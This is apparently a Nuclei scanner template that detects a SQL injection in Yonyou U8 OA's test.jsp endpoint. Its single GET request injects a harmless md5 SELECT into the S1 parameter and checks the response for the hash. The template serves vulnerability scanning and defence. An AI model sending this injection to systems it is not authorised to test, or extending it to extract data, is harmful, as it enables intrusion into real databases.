id: yonyou-u8-oa-sqli

info:
  name: Yonyou U8 - SQL Injection
  author: ritikchaddha
  severity: critical
  description: Yonyou U8 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  reference:
    - http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20OA%20test.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
    - https://www.tencentcloud.com/document/product/627/38435
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-89
  metadata:
    max-request: 1
  tags: yonyou,oa,sqli
variables:
  num: "999999999"

http:
  - method: GET
    path:
      - '{{BaseURL}}/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{num}}))'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5({{num}})}}'

      - type: status
        status:
          - 200

# digest: 4b0a00483046022100f125e83325bba41b548340828884cf23cc66295d4116d4a79cbfcb8f2f25d649022100aebb7e676d7011f9805677596238172ff73cf16be9aa5aefcfe8efadabb1d1ac:922c64590222798bb761d5b6d8e72950
